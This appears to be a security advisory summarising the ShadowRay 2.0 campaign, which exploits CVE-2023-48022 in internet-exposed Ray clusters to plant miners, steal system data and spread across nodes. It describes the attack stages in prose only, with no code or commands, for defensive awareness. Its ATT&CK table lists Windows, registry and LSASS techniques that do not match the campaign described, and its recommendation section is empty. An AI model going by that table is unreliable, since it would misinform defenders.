EXECUTIVE SUMMARY
Researchers identified a growing operation known as ShadowRay 2.0 that targets exposed Ray clusters by abusing CVE-2023-48022, a flaw that allows remote code execution when Ray job APIs are open to the internet. Even though Ray was designed for internal use, many users run it directly online, creating easy entry points for attackers. ShadowRay 2.0 scans exposed systems using automated callback checks and marks servers that run the probe command as active targets. Once identified, the attackers send jobs through the open API to place scripts, read system data, and spread the attack across all nodes linked to the cluster. The misuse of Ray–s built-in job system makes the attack blend in with normal activity, making it harder to detect. The campaign has grown quickly due to the large number of open Ray dashboards found across different regions, many running without isolation or access controls. After gaining access, the attackers run miners, steal system data, and convert the AI cluster into part of a wider botnet. ShadowRay 2.0 also uses AI-written code to update tasks, bypass errors, and maintain a steady presence across clusters.
ShadowRay 2.0 follows a staged method that mirrors normal Ray use, allowing the attack to stay unnoticed. The attackers begin by sending small test commands to a large group of exposed servers. Any server that replies becomes part of the target list. After access is confirmed, they use the job API to submit tasks that collect hardware details, check GPU load, and plan how much power to use without drawing attention. The scripts are simple and often appear AI-generated, helping them change quickly if blocked or removed. The attackers then expand through the cluster using Ray–s ability to run jobs on many nodes at once, which gives them easy lateral movement. They install small miners that hide under system-like names and set up basic startup tasks to regain access if rebooted. The scripts also search for other miners and shut them down to control all resources. They switch between many online sources to keep payloads active even when older links are removed. Some scripts use region-aware logic, changing download steps depending on the server location to avoid blocks. By using Ray–s normal functions, ShadowRay 2.0 operates quietly and spreads with little resistance.
ShadowRay 2.0 shows how everyday deployment mistakes in AI systems can turn into major risks when exposed online. Instead of breaking software through complex flaws, the attackers use Ray–s own design to run tasks, spread across nodes, and keep their tools active. This turns AI clusters into free compute power for mining, data theft, and long-term control. The steady rise in exposed Ray servers has made it easy for attackers to form a large and active network without needing special methods or heavy tools. Many of the tasks in ShadowRay 2.0 rely on simple code, often shaped by AI models, which lets the attackers rewrite and redeploy parts of the operation quickly. This flexibility keeps the campaign alive even when some servers are cleaned or taken offline. The use of region-based logic, hidden miners, and basic startup persistence shows that the attackers want lasting control rather than quick hits. The operation highlights how AI frameworks can become attack platforms when placed online without protection, allowing even small gaps to turn into large-scale threats. ShadowRay 2.0 serves as a reminder that AI systems need isolation and careful setup to prevent them from becoming part of global misuse.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1195.002 | Supply Chain Compromise | Compromise Software Supply Chain |
| Execution | T1059.003 | Command and Scripting Interpreter | Windows Command Shell |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Privilege Escalation | T1055.012 | Process Injection | Process Hollowing |
| Defense Evasion | T1027.002 | Obfuscated Files or Information | Software Packing |
| Credential Access | T1003 | OS Credential Dumping | LSASS Memory |
| Discovery | T1082 | System Information Discovery | – |
| Lateral Movement | T1570 | Lateral Tool Transfer | – |
| Command and Control | T1105 | Ingress Tool Transfer | – |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | – |
RECOMMENDATION:
REFERENCES:
The following reports contain further technical details:
https://www.bleepingcomputer.com/news/security/new-shadowray-attacks-convert-ray-clusters-into-crypto-miners/
https://www.oligo.security/blog/shadowray-2-0-attackers-turn-ai-against-itself-in-global-campaign-that-hijacks-ai-into-self-propagating-botnet